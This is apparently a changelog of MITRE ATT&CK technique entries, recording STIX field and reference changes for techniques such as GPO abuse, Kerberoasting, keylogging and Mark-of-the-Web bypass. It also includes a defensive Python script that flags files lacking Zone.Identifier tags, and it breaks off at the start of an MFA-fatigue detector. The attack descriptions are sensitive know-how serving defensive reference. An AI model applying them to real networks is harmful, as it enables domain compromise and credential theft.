be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
external_references[1]['source_name'] | TechNet Group Policy Basics | Mandiant M Trends 2016
external_references[1]['description'] | srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019. | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.
external_references[1]['url'] | https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
external_references[3]['source_name'] | Wald0 Guide to GPOs | Microsoft Hacking Team Breach
external_references[3]['description'] | Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019. | Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.
external_references[3]['url'] | https://wald0.com/?p=179 | https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/
external_references[4]['source_name'] | Harmj0y Abusing GPO Permissions | Wald0 Guide to GPOs
external_references[4]['description'] | Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019. | Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.
external_references[4]['url'] | http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ | https://wald0.com/?p=179
external_references[5]['source_name'] | Mandiant M Trends 2016 | Harmj0y Abusing GPO Permissions
external_references[5]['description'] | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019. | Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.
external_references[5]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf | http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
external_references[6]['source_name'] | Microsoft Hacking Team Breach | Harmj0y SeEnableDelegationPrivilege Right
external_references[6]['description'] | Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019. | Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
external_references[6]['url'] | https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/ | http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
external_references[7]['source_name'] | Harmj0y SeEnableDelegationPrivilege Right | TechNet Group Policy Basics
external_references[7]['description'] | Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019. | srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.
external_references[7]['url'] | http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ | https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
x_mitre_data_sources[0] | Active Directory: Active Directory Object Creation | Active Directory: Active Directory Object Modification
x_mitre_data_sources[1] | Command: Command Execution | Active Directory: Active Directory Object Deletion
x_mitre_data_sources[2] | Active Directory: Active Directory Object Deletion | Active Directory: Active Directory Object Creation
x_mitre_data_sources[3] | Active Directory: Active Directory Object Modification | Command: Command Execution

[T1200] Hardware Additions

Current version: 1.6

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-28 16:09:12.782000+00:00 | 2023-03-30 21:01:40.332000+00:00
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/440.html', 'external_id': 'CAPEC-440'} |

[T1562.003] Impair Defenses: Impair Command History Logging

Current version: 2.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-01 20:48:29.785000+00:00 | 2023-03-30 21:01:47.940000+00:00
x_mitre_data_sources[0] | Sensor Health: Host Status | Command: Command Execution
x_mitre_data_sources[1] | Command: Command Execution | Sensor Health: Host Status
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/13.html', 'external_id': 'CAPEC-13'} |

[T1056] Input Capture

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
external_references |  | Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-569 |
values_changed
STIX Field | Old value | New Value
modified | 2022-03-08 21:05:20.658000+00:00 | 2023-03-30 21:01:41.752000+00:00
external_references[1]['source_name'] | capec | Adventures of a Keystroke
external_references[1]['url'] | https://capec.mitre.org/data/definitions/569.html | http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
x_mitre_data_sources[1] | Process: Process Creation | Driver: Driver Load
x_mitre_data_sources[5] | Process: Process Metadata | Process: Process Creation
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources |  | Process: Process Metadata
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Adventures of a Keystroke', 'description': 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.', 'url': 'http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf'} |
x_mitre_data_sources | Driver: Driver Load |

[T1553.004] Subvert Trust Controls: Install Root Certificate

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
external_references |  | Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-479 |
values_changed
STIX Field | Old value | New Value
modified | 2021-08-25 19:39:07.001000+00:00 | 2023-03-30 21:01:45.661000+00:00
external_references[1]['source_name'] | capec | Wikipedia Root Certificate
external_references[1]['url'] | https://capec.mitre.org/data/definitions/479.html | https://en.wikipedia.org/wiki/Root_certificate
external_references[2]['source_name'] | Wikipedia Root Certificate | Operation Emmental
external_references[2]['description'] | Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017. | Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.
external_references[2]['url'] | https://en.wikipedia.org/wiki/Root_certificate | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf
external_references[3]['source_name'] | Operation Emmental | Kaspersky Superfish
external_references[3]['description'] | Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016. | Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.
external_references[3]['url'] | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf | https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/
external_references[4]['source_name'] | Kaspersky Superfish | SpectorOps Code Signing Dec 2017
external_references[4]['description'] | Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017. | Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.
external_references[4]['url'] | https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/ | https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
external_references[5]['source_name'] | SpectorOps Code Signing Dec 2017 | objective-see ay mami 2018
external_references[5]['description'] | Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018. | Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.
external_references[5]['url'] | https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec | https://objective-see.com/blog/blog_0x26.html
external_references[6]['source_name'] | objective-see ay mami 2018 | Microsoft Sigcheck May 2017
external_references[6]['description'] | Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018. | Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.
external_references[6]['url'] | https://objective-see.com/blog/blog_0x26.html | https://docs.microsoft.com/sysinternals/downloads/sigcheck
external_references[7]['source_name'] | Microsoft Sigcheck May 2017 | Tripwire AppUNBlocker
external_references[7]['description'] | Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018. | Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.
external_references[7]['url'] | https://docs.microsoft.com/sysinternals/downloads/sigcheck | https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/
x_mitre_data_sources[0] | Process: Process Creation | Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[3] | Windows Registry: Windows Registry Key Modification | Process: Process Creation
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Tripwire AppUNBlocker', 'description': 'Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.', 'url': 'https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/'} |

[T1558.003] Steal or Forge Kerberos Tickets: Kerberoasting

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
external_references |  | EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-509 |
values_changed
STIX Field | Old value | New Value
modified | 2022-03-08 21:52:42.405000+00:00 | 2023-03-30 21:01:46.538000+00:00
external_references[1]['source_name'] | capec | Empire InvokeKerberoast Oct 2016
external_references[1]['url'] | https://capec.mitre.org/data/definitions/509.html | https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
external_references[2]['source_name'] | Empire InvokeKerberoast Oct 2016 | AdSecurity Cracking Kerberos Dec 2015
external_references[2]['description'] | EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018. | Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.
external_references[2]['url'] | https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 | https://adsecurity.org/?p=2293
external_references[3]['source_name'] | AdSecurity Cracking Kerberos Dec 2015 | Microsoft Detecting Kerberoasting Feb 2018
external_references[3]['description'] | Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018. | Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.
external_references[3]['url'] | https://adsecurity.org/?p=2293 | https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
external_references[4]['source_name'] | Microsoft Detecting Kerberoasting Feb 2018 | Microsoft SPN
external_references[4]['description'] | Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018. | Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.
external_references[4]['url'] | https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/ | https://msdn.microsoft.com/library/ms677949.aspx
external_references[5]['source_name'] | Microsoft SPN | Microsoft SetSPN
external_references[5]['description'] | Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018. | Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.
external_references[5]['url'] | https://msdn.microsoft.com/library/ms677949.aspx | https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
external_references[6]['source_name'] | Microsoft SetSPN | SANS Attacking Kerberos Nov 2014
external_references[6]['description'] | Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018. | Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.
external_references[6]['url'] | https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx | https://redsiege.com/kerberoast-slides
external_references[7]['source_name'] | SANS Attacking Kerberos Nov 2014 | Harmj0y Kerberoast Nov 2016
external_references[7]['description'] | Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018. | Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.
external_references[7]['url'] | https://redsiege.com/kerberoast-slides | https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Harmj0y Kerberoast Nov 2016', 'description': 'Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.', 'url': 'https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/'} |

[T1056.001] Input Capture: Keylogging

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
external_references |  | Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-568 |
values_changed
STIX Field | Old value | New Value
modified | 2020-10-21 01:30:56.227000+00:00 | 2023-03-30 21:01:37.930000+00:00
external_references[1]['source_name'] | capec | Adventures of a Keystroke
external_references[1]['url'] | https://capec.mitre.org/data/definitions/568.html | http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
external_references[2]['source_name'] | Adventures of a Keystroke | Cisco Blog Legacy Device Attacks
external_references[2]['description'] | Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016. | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
external_references[2]['url'] | http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources |  | Windows Registry: Windows Registry Key Modification
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Cisco Blog Legacy Device Attacks', 'description': 'Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.', 'url': 'https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954'} |
x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |

[T1543.004] Create or Modify System Process: Launch Daemon

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version |  | 3.1.0
external_references |  | Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.
external_references |  | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-550 |
external_references | CAPEC-551 |
values_changed
STIX Field | Old value | New Value
modified | 2021-10-07 22:10:55.653000+00:00 | 2023-03-30 21:01:48.453000+00:00
external_references[1]['source_name'] | capec | AppleDocs Launch Agent Daemons
external_references[1]['url'] | https://capec.mitre.org/data/definitions/550.html | https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
external_references[2]['source_name'] | capec | Methods of Mac Malware Persistence
external_references[2]['url'] | https://capec.mitre.org/data/definitions/551.html | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
external_references[3]['source_name'] | AppleDocs Launch Agent Daemons | launchd Keywords for plists
external_references[3]['description'] | Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017. | Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.
external_references[3]['url'] | https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html | https://www.real-world-systems.com/docs/launchdPlist.1.html
external_references[4]['source_name'] | Methods of Mac Malware Persistence | WireLurker
external_references[4]['description'] | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. | Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.
external_references[4]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf
external_references[5]['source_name'] | launchd Keywords for plists | OSX Malware Detection
external_references[5]['description'] | Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.
external_references[5]['url'] | https://www.real-world-systems.com/docs/launchdPlist.1.html | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
external_references[6]['source_name'] | WireLurker | LaunchDaemon Hijacking
external_references[6]['description'] | Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017. | Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.
external_references[6]['url'] | https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf | https://bradleyjkemp.dev/post/launchdaemon-hijacking/
external_references[7]['source_name'] | OSX Malware Detection | sentinelone macos persist Jun 2019
external_references[7]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.
external_references[7]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://www.sentinelone.com/blog/how-malware-persists-on-macos/
x_mitre_data_sources[1] | File: File Modification | Service: Service Creation
x_mitre_data_sources[2] | Service: Service Modification | File: File Creation
x_mitre_data_sources[4] | File: File Creation | Service: Service Modification
x_mitre_data_sources[5] | Service: Service Creation | File: File Modification
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'LaunchDaemon Hijacking', 'description': 'Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.', 'url': 'https://bradleyjkemp.dev/post/launchdaemon-hijacking/'} |
external_references | {'source_name': 'sentinelone macos persist Jun 2019', 'description': 'Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.', 'url': 'https://www.sentinelone.com/blog/how-malware-persists-on-macos/'} |

[T1553.005] Subvert Trust Controls: Mark-of-the-Web Bypass

Current version: 1.1


Old Description
New Description
Apart from whitespace, the old and new descriptions differ in a single phrase: "If the file in not known/trusted, SmartScreen will prevent the execution" (old) became "If the file is not known/trusted, SmartScreen will prevent the execution" (new). The full text of both versions is recorded in the description row under Details.
Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-05 04:59:32.535000+00:00 | 2023-03-22 14:19:50.768000+00:00
description | Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020) | Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions.
For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | File: File Creation | File: File Metadata
x_mitre_data_sources[1] | File: File Metadata | File: File Creation
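The description above records how Windows tags a download with a Zone.Identifier stream and why files pulled out of an ISO, VHD or archive can arrive without that tag. The following is an added example, not part of the ATT&CK changelog and not Microsoft tooling: a small Python triage script that parses the stream's [ZoneTransfer] section, decides whether a file still carries an Internet-zone mark, and lists which members of an extracted or mounted container do not. The sample stream contents and file names are constructed for the example; the stream read uses the Windows path:stream syntax and therefore only works on NTFS under Windows, which is why the scanner accepts an injectable reader so the logic can be exercised elsewhere.

```python
"""Triage helpers for the Zone.Identifier (Mark-of-the-Web) stream.

Added example, not ATT&CK or Microsoft code. The stream layout
([ZoneTransfer] / ZoneId=... / ReferrerUrl=... / HostUrl=...) and the
URLZONE numbering are Windows facts; the file names below are made up.
"""
import sys
from typing import Callable, Dict, Iterable, List, Optional

# URLZONE values (urlmon.h). ZoneId=3 (Internet) is what SmartScreen and
# Office Protected View key on; 4 (Restricted) is treated the same way.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted",
              3: "Internet", 4: "Restricted"}
STREAM_NAME = "Zone.Identifier"

# Constructed sample of what a browser writes into the ADS on download.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://files.example.invalid/\r\n"
    "HostUrl=https://files.example.invalid/invoice.iso\r\n"
)


def parse_zone_identifier(text: str) -> Dict[str, str]:
    """Parse the INI-style [ZoneTransfer] section into key/value pairs.

    Only keys inside [ZoneTransfer] are returned; anything in another
    section is ignored, so a stray section cannot smuggle in a bogus ZoneId.
    """
    fields: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "zonetransfer"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def zone_id(text: str) -> Optional[int]:
    """Return the numeric ZoneId, or None when the stream is empty or malformed."""
    try:
        return int(parse_zone_identifier(text).get("ZoneId", ""))
    except ValueError:
        return None


def carries_motw(text: str) -> bool:
    """True when the stream marks the file as Internet (3) or Restricted (4)."""
    zid = zone_id(text)
    return zid is not None and zid >= 3


def read_stream(path: str) -> str:
    """Read <path>:Zone.Identifier; return '' when the file has no such stream.

    NTFS alternate data streams are addressed with the path:stream syntax,
    which CPython passes straight through to CreateFile on Windows. On any
    other platform the stream cannot exist, so refuse rather than guess.
    """
    if not sys.platform.startswith("win"):
        raise OSError("NTFS alternate data streams require Windows")
    try:
        with open(f"{path}:{STREAM_NAME}", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except FileNotFoundError:
        return ""


def untagged_files(paths: Iterable[str],
                   reader: Callable[[str], str] = read_stream) -> List[str]:
    """Return the paths whose stream does not carry MOTW.

    Run this over the contents of an extracted archive or a mounted ISO/VHD:
    the container itself is normally tagged, but members that come out
    without ZoneId 3 or 4 will run without SmartScreen or Protected View.
    """
    return [p for p in paths if not carries_motw(reader(p))]


if __name__ == "__main__":
    # python motw_check.py <file> [<file> ...]   (Windows / NTFS only)
    for path in untagged_files(sys.argv[1:]):
        print(f"no Mark-of-the-Web: {path}")
```

On a Windows host, pointing the script at the files inside a freshly mounted ISO will typically list every member, which is exactly the page's point: the container was tagged, its contents were not.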

[T1036.005] Masquerading: Match Legitimate Name or Location

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-05 04:56:50.197000+00:00 | 2023-03-30 21:01:42.277000+00:00
x_mitre_data_sources[1] | Image: Image Metadata | Process: Process Metadata
x_mitre_data_sources[2] | Process: Process Metadata | Image: Image Metadata
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/177.html', 'external_id': 'CAPEC-177'} |

[T1556.006] Modify Authentication Process: Multi-Factor Authentication

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21 19:19:07.519000+00:00 | 2023-02-09 14:18:59.080000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | User Account: User Account Modification | User Account: User Account Authentication
x_mitre_data_sources[1] | User Account: User Account Authentication | User Account: User Account Modification
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors |  | Muhammad Moiz Arshad, @5T34L7H

[T1621] Multi-Factor Authentication Request Generation

Current version: 1.0


Old Description
New Description
Apart from whitespace, the old and new descriptions differ in a single phrase: "Adversaries in possession credentials to [Valid Accounts]" (old) became "Adversaries in possession of credentials to [Valid Accounts]" (new). The full text of both versions is recorded in the description row under Details.
Details
values_changed
STIX Field | Old value | New Value
modified | 2022-08-05 13:55:20.002000+00:00 | 2023-04-04 03:06:34.448000+00:00
description | Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe) | Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.
In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Logon Session: Logon Session Metadata | User Account: User Account Authentication
x_mitre_data_sources[1] | Logon Session: Logon Session Creation | Application Log: Application Log Content
x_mitre_data_sources[2] | Application Log: Application Log Content | Logon Session: Logon Session Metadata
x_mitre_data_sources[3] | User Account: User Account Authentication | Logon Session: Logon Session Creation
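The description above explains the push-bombing variant: repeated login attempts with a valid password generate a stream of MFA prompts until the user approves one out of fatigue. As an added example that is not ATT&CK's own content, the Python below implements the detection that the User Account Authentication and Application Log data sources listed for this technique are meant to feed: group second-factor challenges per user, slide a time window over them, and alert when the prompt count crosses a threshold, recording whether the burst contained an approval. The event schema, the thresholds and the sample sign-in records are assumptions constructed for the example; map the fields to whatever your identity provider actually logs.

```python
"""Detector for MFA push bombing ("MFA fatigue") in identity-provider sign-in logs.

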